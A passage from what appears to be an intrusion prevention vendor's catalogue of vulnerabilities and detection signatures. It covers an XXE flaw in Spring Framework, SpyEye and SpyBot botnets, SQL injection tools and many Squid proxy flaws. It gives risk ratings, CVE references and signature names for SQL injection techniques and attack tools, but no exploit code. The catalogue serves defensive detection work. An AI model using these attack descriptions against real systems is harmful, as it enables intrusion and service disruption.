There is an information disclosure vulnerability in SpringSource Spring Framework. The vulnerability is due to incorrectly configured XML parsing which accepts XML external entities from untrusted sources. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in the disclosure of information from arbitrary files available to the security context of the server application.

Situation:

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities

References:

CVE-2013-4152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4152

BID-61951
http://www.securityfocus.com/bid/61951

OSVDB-96520
http://www.osvdb.org/96520

Spybot-Botnet

About this vulnerability:	SpyBot botnet
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	SpyBot is an IRC-controlled bot.
Situation:	Generic_SS-Botnet-Spybot-Activity

Spyeye-Botnet

About this vulnerability:	Spyeye botnet
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	SpyEye is a malicious botnet. While the main focus of SpyEye's monetization is banking fraud and the theft of banking credentials, the bot has the ability to download arbitrary malicious add-on modules at any time. A system infected with SpyEye is likely to be subject to surveillance of the attacker by help of SpyEye's keystroke logging capability as well as its ability to inspect HTTP communications of the common web browsers Internet Explorer and Mozilla Firefox. Furthermore, SpyEye attempts to steal credentials for FTP and POP3 services.
Situation:	HTTP_CS-Spyeye-Traffic HTTP_CSU-Spyeye-Traffic

SpyLocked-Application-Usage

About this vulnerability:	SpyLocked Application Usage
Risk:	Low
First detected in:	sgpkg-ips-111-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SpyLocked
Type:	Misconfiguration
Description:	SpyLocked may be considered unwanted software by many organizations. It is an anti-spyware application that may display exaggerated or false spyware scan reports but will not perform threat removal before the software is bought.
Situation:	HTTP_CSH-SpyLocked-Application-Usage

Spyware-Webhancer

About this vulnerability:	Spyware WebHancer
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WebHancer
Type:	Misconfiguration
Description:	WebHancer is a spyware that tracks the user's internet traffic and sends information to a remote server. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Spyware-Webhancer HTTP_CSH-Spyware-Webhancer

SQL-Injection

About this vulnerability:	SQL injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-145-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic SQL Server; MySQL; Microsoft SQL Server; PostgreSQL
Type:	SQL Injection
Description:	Many networked applications use SQL databases to store data. In some cases, programming errors allow user-controlled data to include SQL statements that are executed in the database server. This may allow an attacker to retrieve and alter user credentials, and execute arbitrary commands in the context of the database server.
Situation:	HTTP_CSU-SQL-Injection-End-Of-Line-Comments HTTP_CSH-SQL-Union-Select HTTP_CSU-SQL-Union-Select HTTP_CSU-SQL-Select-Password HTTP_CSU-SQL-Declare-Cast HTTP_CSU-SQL-Expression-Always-True HTTP_CRL-SQL-Union-Select HTTP_CRL-Possible-SQL-Injection-PgSleep HTTP_CRL-Possible-SQL-Injection-WAITFOR-DELAY HTTP_CRL-Possible-SQL-Injection-BENCHMARK HTTP_CRL-Possible-SQL-Injection-INTO-OUTFILE HTTP_CRL-Possible-SQL-Version-Query HTTP_CRL-InformationSchema-Query HTTP_CRL-Possible-SQL-Injection-InformationSchema HTTP_CRL-Possible-SQL-Injection-LoadFile HTTP_CRL-Possible-SQL-Injection HTTP_CRL-Possible-Evasion-In-SQL-Injection HTTP_CRL-Possible-SQL-Injection-2 HTTP_CSH-Possible-SQL-Injection

SQL-Injection-Attack-Tool

About this vulnerability:	SQL Injection Attack Tool
Risk:	High
First detected in:	sgpkg-ips-332-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	SQL Injection
Description:	Some SQL attack tools can be identified on basis of the User-Agent they use. This vulnerability is reserved for those.
Situation:	HTTP_CSH-SQL-Injection-Attack-Tool-Detected

Sqlmap-SQL-Injection-Tool

About this vulnerability:	Sqlmap SQL Injection Tool
Risk:	High
First detected in:	sgpkg-ips-553-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	SQL Injection
Description:	Sqlmap SQL Injection tool can be used to find and exploit SQL injection vulnerabilities on a web page.
Situation:	HTTP_CSU-SQL-Injection-End-Of-Line-Comments HTTP_CSH-Sqlmap-SQL-Injection-Tool-Usage

Sqlninja-Attack-Tool-Usage

About this vulnerability:	Detects the usage of Sqlninja, an SQL injection attack tool
Risk:	Moderate
First detected in:	sgpkg-ips-122-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Microsoft SQL Server
Type:	SQL Injection
Description:	Sqlninja is a tool that exploits SQL injection vulnerabilities in web applications that use Microsoft SQL server as their back-end. The tool can be used to bruteforce passwords, escalate privileges, bind shells etc.
Situation:	HTTP_CRL-Sqlninja-Attack-Tool-Usage

Squash-YAML-Code-Execution

About this vulnerability:

Squash YAML Remote Code Execution vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Squash

Type:

Code Injection

Description:

There is an arbitrary code execution vulnerability in Squash exception reporting and management system. Exploiting an unsafe function call may be used for running arbitrary ruby code.

Situation:

HTTP_CS-Squash-YAML-Code-Execution

References:

CVE-2013-5036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5036

OSVDB-95992
http://www.osvdb.org/95992

SQuery-Php-Remote-File-Inclusion

About this vulnerability:

A vulnerability in SQuery

Risk:

High

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SQuery

Type:

Code Injection

Description:

There is a vulnerability in SQuery that allows inclusion of arbitary files leading to code injection and execution in the context of the web server.

Situation:

HTTP_CSU-SQuery-Php-Remote-File-Inclusion

References:

CVE-2006-1688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1688

BID-17434
http://www.securityfocus.com/bid/17434

OSVDB-24429
http://www.osvdb.org/24429

OSVDB-24428
http://www.osvdb.org/24428

OSVDB-24427
http://www.osvdb.org/24427

OSVDB-24426
http://www.osvdb.org/24426

OSVDB-24425
http://www.osvdb.org/24425

OSVDB-24424
http://www.osvdb.org/24424

OSVDB-24423
http://www.osvdb.org/24423

OSVDB-24422
http://www.osvdb.org/24422

OSVDB-24420
http://www.osvdb.org/24420

OSVDB-24419
http://www.osvdb.org/24419

OSVDB-24418
http://www.osvdb.org/24418

OSVDB-24417
http://www.osvdb.org/24417

OSVDB-24416
http://www.osvdb.org/24416

OSVDB-24415
http://www.osvdb.org/24415

OSVDB-24414
http://www.osvdb.org/24414

OSVDB-24413
http://www.osvdb.org/24413

OSVDB-24412
http://www.osvdb.org/24412

OSVDB-24411
http://www.osvdb.org/24411

OSVDB-24410
http://www.osvdb.org/24410

OSVDB-24409
http://www.osvdb.org/24409

OSVDB-24421
http://www.osvdb.org/24421

OSVDB-24408
http://www.osvdb.org/24408

OSVDB-24407
http://www.osvdb.org/24407

OSVDB-24406
http://www.osvdb.org/24406

OSVDB-24405
http://www.osvdb.org/24405

OSVDB-24404
http://www.osvdb.org/24404

OSVDB-24403
http://www.osvdb.org/24403

OSVDB-24402
http://www.osvdb.org/24402

OSVDB-24401
http://www.osvdb.org/24401

Squid-Acl-Bypass-Using-Null

About this vulnerability:

Squid regex ACL bypass by using NULL in url

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; SCO

Software:

Squid

Type:

Metacharacter

Description:

Squid 2.5STABLE4 and earlier allow bypassing of the regex access control lists (ACL). If the url contains a NULL character only the part before the NULL character is inspected against the ACL's. This can lead to unauthorized content being accessed.

Situation:

HTTP_CS-Squid-Acl-Bypass-Using-Null

References:

CVE-2004-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189

BID-9778
http://www.securityfocus.com/bid/9778

OSVDB-5916
http://www.osvdb.org/5916

Squid-ASN.1-Header-Parsing-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Web Proxy Cache

Risk:

Moderate

First detected in:

sgpkg-ips-713-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

There is a vulnerability in Squid web proxy.

Situation:

Generic_UDP-Squid-ASN.1-Header-Parsing-Denial-of-Service
SNMP-UDP_Squid-ASN.1-Header-Parsing-Denial-Of-Service

References:

CVE-2004-0918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0918

BID-11385
http://www.securityfocus.com/bid/11385

Squid-DNS-Lookup-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid Web Proxy Cache

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Misconfiguration

Description:

There exists a vulnerability in the way Squid Web Proxy processes Domain Name System (DNS) responses. This vulnerability occurs when Squid performs a Fully-Qualified Domain Name (FQDN) lookup and receives a crafted DNS response. The vulnerability can be exploited by a malicious user to cause a denial of service to the Squid proxy.

Situation:

DNS-TCP_Squid-DNS-Lookup-Denial-Of-Service
DNS-UDP_Squid-DNS-Lookup-Denial-Of-Service

References:

CVE-2005-0446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0446

BID-12551
http://www.securityfocus.com/bid/12551

Squid-DNS-Replies-Invalid-Free

About this vulnerability:

A Squid DNS Replies Invalid Free vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

A vulnerability in Squid web proxy which allows remote attackers to cause a denial of service condition, due to an error while processing certain DNS replies.

Situation:

DNS-UDP_Squid-DNS-Replies-Invalid-Free

References:

CVE-2011-4096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4096

Squid-Gopher-Protocol-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Squid Project Squid Web Proxy Cache

Risk:

Moderate

First detected in:

sgpkg-ips-357-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Buffer Overflow

Description:

A vulnerability exists in the way Squid web proxy handles responses from Gopher servers. An overly long line in a Gopher response can overflow a fixed size buffer. This could create a denial of service condition for active transactions or could potentially allow an arbitrary code execution with permissions of an account running Squid web proxy. Upon receiving the attack, a Squid proxy will continue without change to its functionality since the buffer overflow does not corrupt any critical data. The browser requesting the Gopher URL might see overly long file names or entries in the HTML page returned from the proxy. As noted in section 4.1, "Technical Mechanism", the mitigation of this vulnerability will occur in the majority of cases for operating systems supporting the ELF, AOUT or PE executable file format. For operating systems that use a different file format and program image layout, or for the rare case where a non-standard compiler is used, the mitigation factor may not exist. In such a case, an attacker can exploit this flaw to terminate the vulnerable product, creating a denial of service condition. Potentially, an attack may also execute arbitrary code on the target. In this case, the behaviour of the target is dependent on the malicious code.

Situation:

Generic_SS-Squid-Gopher-Protocol-Handling-Buffer-Overflow

References:

CVE-2005-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0094

BID-12276
http://www.securityfocus.com/bid/12276

Squid-HTTP-Host-Header-Port-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-533-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

There is a denial-of-service vulnerability in Squid proxy. The vulnerability is due to incorrect validation of port values in the HTTP Host header within the hostHeaderVerify function. A remote, unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the vulnerable server. A successful attack attempt would result in the termination of Squid proxy server creating a denial-of-service condition.

Situation:

HTTP_CSH-Squid-HTTP-Host-Header-Port-Handling-Denial-Of-Service

References:

CVE-2013-4123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4123

Squid-HTTP-Response-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

An improper bounds check in the Squid HTTP proxy causes a vulnerability, which when successfully exploited, can allow an attacker to cause a denial of service condition.

Situation:

HTTP_CSH-Squid-HTTP-Response-Processing-Denial-Of-Service

References:

CVE-2016-3948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3948

Squid-HTTP-Version-Number-Parsing-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

There exists a denial of service vulnerability in the way Squid handles HTTP version number.

Situation:

HTTP8080_CS-Squid-HTTP-Version-Number-Parsing-Denial-Of-Service

References:

BID-33604
http://www.securityfocus.com/bid/33604

Squid-Httpmakevarymark-Header-Value-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

There is a denial-of-service vulnerability in Squid Proxy. The vulnerability is due to a miscalculation of a string size when handling HTTP header values. This causes an assertion to fail, and repeated failures can cause the entire service to terminate. A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request. Authentication may not be required depending on the server's configuration. Successful exploitation will cause the Squid Proxy service to terminate.

Situation:

HTTP_CSH-Squid-Httpmakevarymark-Header-Value-DoS

References:

OSVDB-90909
http://www.osvdb.org/90909

Squid-Long-String-Header-Processing-Assertion-Failure

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-756-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in Squid proxy.

Situation:

HTTP_SHS-Squid-Long-String-Header-Processing-Assertion-Failure

References:

CVE-2016-2569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2569

Squid-Ntlm-BOF

About this vulnerability:

Squid NTLM Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-13-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Squid

Type:

Buffer Overflow

Description:

Squid Web Proxy Cache suffers from a buffer overflow vulnerability in the NT Lan Manager functionality. The vulnerability can be exploited to gain the privileges of the squid process.

Situation:

HTTP_CSH-Squid-NTLM-Buffer-Overflow
HTTP_CS-Squid-Ntlm-BOF

References:

CVE-2004-0541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0541

BID-10500
http://www.securityfocus.com/bid/10500

Squid-Oversized-Reply-Header-Handling

About this vulnerability:	A vulnerability in Squid
Risk:	High
First detected in:	sgpkg-ips-413-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	Squid
Type:	Buffer Overflow
Description:	A vulnerability exists in the way the Squid web proxy/cache parses a overly large HTTP reply header. An oversized HTTP reply header could trigger unexpected behaviour on the vulnerable Squid server. This flaw cannot be used to exploit the Squid proxy. However, it may be used to attack a client of the proxy.
Situation:	HTTP8080_Squid-Oversized-Reply-Header-Handling

Squid-Oversized-Reply-Header-Handling-Vulnerability

About this vulnerability:	A vulnerability in Squid Project Squid Web Proxy Cache
Risk:	Moderate
First detected in:	sgpkg-ips-357-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Squid
Type:	Buffer Overflow
Description:	A vulnerability exists in the way the Squid web proxy/cache parses a overly large HTTP reply header. An oversized HTTP reply header could trigger unexpected behaviour on the vulnerable Squid server. This flaw cannot be used to exploit the Squid proxy. However, it may be used to attack a client of the proxy.
Situation:	HTTP_SHS-Suspiciously-Long-Reply-Header

Squid-Pinger-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid web proxy's Pinger service

Risk:

Moderate

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Squid

Type:

Input Validation

Description:

A denial of service vulnerability exists in Squid web proxy's Pinger service. The vulnerability is due to an out of bounds array access when processing ICMP responses. A remote attacker can exploit this vulnerability by sending a specially crafted ICMP response to a vulnerable system. This can result in a denial of service condition.

Situation:

IPv6_Unknown-ICMPv6-Message-Type

References:

CVE-2014-7141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7141

OSVDB-111420
http://www.osvdb.org/111420

Squid-Proxy-Cache-Cachemgr.cgi-Resource-Exhaustion

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-501-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Resource Starvation

Description:

A resource exhaustion vulnerability exists in Squid Proxy Cache Manager. The vulnerability is due to missing input validation in the cachemgr.cgi tool. A remote, unauthenticated attacker can send specially crafted POST requests to cause cachemgr.cgi to use large amounts of memory. Successful exploitation of this vulnerability results in a denial-of-service condition.

Situation:

HTTP_CSH-Squid-Proxy-Cache-Cachemgr.cgi-Resource-Exhaustion

References:

CVE-2012-5643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5643

OSVDB-88492
http://www.osvdb.org/88492

Squid-Proxy-Cache-Manager-Expired-Pointer-Dereference

About this vulnerability:

A vulnerability in Squid

Risk:

Moderate

First detected in:

sgpkg-ips-1715-5242

Last changed:

sgpkg-ips-1715-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

An expired pointer dereference vulnerability has been reported in Squid Proxy. The vulnerability is due to a use after free in CacheManager::start. Successful exploitation of this vulnerability can result in a denial of service condition.

Situation:

HTTP_CS-Squid-Proxy-Cache-Manager-Expired-Pointer-Dereference

References:

CVE-2024-23638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23638

Squid-Proxy-Cache-Update-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Resource Starvation

Description:

There is a denial of service vulnerability in Squid web proxy application. The flaw is due to incorrect bounds checking when processing crafted cache update reply messages. A remote unauthenticated attacker may trigger this vulnerability to terminate the affected service. Upon receiving a crafted HTTP request message, the Squid proxy server will terminate and reset all established connections. However, the Squid monitor process will re-spawn the worker process automatically which restores the proxy services. If the attack is launched continuously, the target Squid proxy may be put into a lasting denial-of-service condition.

Situation:

HTTP_CS-Squid-Proxy-Cache-Update-Denial-Of-Service

References:

BID-26687
http://www.securityfocus.com/bid/26687

Squid-Proxy-Cache-Update-DoS

About this vulnerability:

Squid Proxy Cache Update DoS Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-680-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

A vulnerability exists in Squid 2.6.STABLE16 and earlier that allows remote attackers to create a denial of service condition due to the lack of boundary checking of the proxy server.

Situation:

HTTP_SHS-Squid-Proxy-Cache-Update-DoS

References:

CVE-2007-6239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6239

BID-26687
http://www.securityfocus.com/bid/26687

Squid-Proxy-Cachemgr.cgi-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Squid Proxy

Risk:

High

First detected in:

sgpkg-ips-1177-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

A vulnerability in Squid Proxy which allows a remote attacker to execute arbitrary code on a target user's browser by enticing a user to open a crafted link or web page, due to improper sanitization of the user_name and auth parameters within cachemgr.cgi.

Situation:

HTTP_CSR-Squid-Proxy-Cachemgr.cgi-Reflected-Cross-Site-Scripting

References:

CVE-2019-13345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13345

Squid-Proxy-Digest-Authentication-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid

Risk:

Moderate

First detected in:

sgpkg-ips-1190-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in Squid Proxy. This vulnerability could be remotely exploited. Successful exploitation could lead in denial-of-service conditions.

Situation:

HTTP_CS-Squid-Proxy-Digest-Authentication-Denial-Of-Service

References:

CVE-2019-12525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12525

Squid-Proxy-Digest-Nc-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Squid

Risk:

Moderate

First detected in:

sgpkg-ips-1671-5242

Last changed:

sgpkg-ips-1671-5242

Platform:

Generic

Software:

Squid

Type:

Buffer Overflow

Description:

Improper validation of the user-supplied nc field in an authorization header causes a heap buffer overflow in the Squid proxy. A successful exploit can cause a denial of service condition or possibly code execution on the target system.

Situation:

HTTP_CSH-Squid-Proxy-Digest-Nc-Heap-Buffer-Overflow

References:

CVE-2023-46847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46847

Squid-Proxy-Digest-Nonce-Information-Disclosure

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-1208-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Squid Proxy. The vulnerability is due to improperly constructing the nonce value used in HTTP Digest authentication. A remote attacker could exploit this vulnerability by sending a request to the target server and subsequently using the obtained nonce value in unintended ways. Successful exploitation could result in the attacker obtaining pointer addresses, which may be used to bypass ASLR and facilitate other attacks.

Situation:

HTTP_SHS_Squid-Proxy-Digest-Nonce-Information-Disclosure

References:

CVE-2019-18679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18679

Squid-Proxy-Esi-Component-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-760-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Buffer Overflow

Description:

Improper validation of Edge-side Include (ESI) responses in the Squid proxy causes a vulnerability which can be leveraged by crafting a malicious ESI response. Successful exploitation can allow the attacker to run arbitrary code on the target.

Situation:

File-Text_Squid-Proxy-Esi-Component-Stack-Buffer-Overflow

References:

CVE-2016-4054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4054

Squid-Proxy-Esi-Response-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-787-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

Incorrect response processing in the Edge Side Includes (ESI) component of the Squid proxy causes a vulnerability which can be exploited to cause a denial of service condition on the target system. This signature covers also CVE-2018-1172.

Situation:

File-Text_Squid-Proxy-Esi-Response-Processing-Denial-Of-Service

References:

CVE-2016-4555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4555

Squid-Proxy-Esi-Response-Processing-Denial-Of-Service-2

About this vulnerability:	A vulnerability in Squid Project Squid
Risk:	Moderate
First detected in:	sgpkg-ips-1039-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Squid
Type:	Malfunction
Description:	Incorrect processing of ESI responses causes a denial of service vulnerability in Squid. A successful attack causes a denial of service condition.
Situation:	File-Text_Squid-Proxy-Esi-Response-Processing-Denial-Of-Service-2

Squid-Proxy-Esi-Response-Processing-Esi_Assign-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid

Risk:

Moderate

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

An input validation error when processing ESI responses with esi:assign tags causes a denial of service vulnerability in the Squid proxy.

Situation:

File-Text_Squid-Proxy-Esi-Response-Processing-Esi_Assign-Denial-Of-Service

References:

CVE-2024-45802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45802

Squid-Proxy-Esi-Response-Processing-Esi_Assign-Underflow-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in Squid Proxy. The vulnerability is due to an input validation error when processing ESI responses with "esi:assign" tags. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted ESI response data to the target server. Successful exploitation could result in a denial-of-service condition.

Situation:

File-Text_Squid-Proxy-Esi-Response-Processing-Esi_Assign-Underflow-Denial-Of-Service

References:

CVE-2024-45802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45802

Squid-Proxy-Esi-Response-Processing-Nullpointer-Denial-Of-Service-CVE-2024-45802

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in Squid Proxy. The vulnerability is due to an input validation error when processing ESI responses. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted ESI response data to the target server. Successful exploitation could result in a denial-of-service condition.

Situation:

File-Text_Squid-Proxy-Esi-Response-Processing-Nullpointer-Denial-Of-Service-CVE-2024-45802

References:

CVE-2024-45802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45802

Squid-Proxy-FTP-URI-Processing-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in the Squid proxy server

Risk:

Moderate

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

There is a denial of service vulnerability in the Squid proxy server. The vulnerability is exploitable via an HTTP request with a crafted FTP URI.

Situation:

HTTP8080_CS-Squid-Proxy-FTP-URI-Processing-Denial-Of-Service

References:

CVE-2007-0247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0247

BID-22079
http://www.securityfocus.com/bid/22079

OSVDB-39839
http://www.osvdb.org/39839

Squid-Proxy-Gopher-Response-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

High

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Squid

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has exists in the Squid proxy server. The vulnerability is due to an error when parsing long lines in response messages from Gopher requests. An attacker can exploit this vulnerability by setting up a Gopher server to send malicious responses, and sending a request for a URL on the malicious server through the proxy. A successful attack could lead to code execution in the context of the affected service. An unsuccessful attack may lead to abnormal termination of the affected service.

Situation:

Generic_SS-Squid-Proxy-Gopher-Response-Processing-Buffer-Overflow

References:

CVE-2011-3205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3205

BID-49356
http://www.securityfocus.com/bid/49356

OSVDB-74847
http://www.osvdb.org/74847

Squid-Proxy-HTCP-Packet-Processing-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Squid Proxy

Risk:

Moderate

First detected in:

sgpkg-ips-293-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Squid

Type:

Malfunction

Description:

There is a denial of service vulnerability in Squid Proxy. A remote attacker can exploit this vulnerability by sending a malicious HTCP request to terminate the affected process, which leads to a denial of service condition.

Situation:

Generic_UDP-Squid-Proxy-HTCP-Packet-Processing-Denial-Of-Service

References:

CVE-2010-0639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0639

BID-38212
http://www.securityfocus.com/bid/38212

OSVDB-62297
http://www.osvdb.org/62297

Squid-Proxy-HTTP-Chunked-Decoder-Denial-Of-Service

About this vulnerability:

A vulnerability in Squid Proxy

Risk:

High

First detected in:

sgpkg-ips-1710-5242

Last changed:

sgpkg-ips-1710-5242

Platform:

Generic

Software:

Squid

Type:

Resource Starvation

Description:

A denial-of-service vulnerability has been reported in Squid Proxy. The vulnerability is due to unbounded recursion when handling chunked HTTP messages. Successful exploitation could result in a denial-of-service condition.

Situation:

HTTP_SCH-Unusually-Large-Chunk-Extension

References:

CVE-2024-25111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25111

Squid-Proxy-HTTP-Header-Parser-Denial-Of-Service

About this vulnerability:

An attempt to exploit a vulnerability in Squid Proxy detected

Risk:

High

First detected in:

sgpkg-ips-1708-5242

Last changed:

sgpkg-ips-1708-5242

Platform:

Generic

Software:

Squid

Type:

Input Validation

Description:

A vulnerability in Squid Proxy, versions before 6.5, which allows remote attackers to cause a denial of service condition in the target server by sending a crafted request, due to improper user input validation when handling HTTP headers.

Situation:

HTTP_CSH-Squid-Proxy-HTTP-Header-Parser-Denial-Of-Service

References:

CVE-2024-25617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25617

Squid-Proxy-HTTP-Message-Processing-Buffer-Overread

About this vulnerability:

A vulnerability in Squid Project Squid

Risk:

Moderate

First detected in:

sgpkg-ips-1692-5242

Last changed:

sgpkg-ips-1692-5242

Platform:

Generic

Software:

Squid

Type:

Malfunction

Description:

Invalid processing of HTTP messages causes a buffer overread vulnerability in the Squid proxy. A successful exploit can allow an attacker to cause a denial of service condition on the target.

Situation:

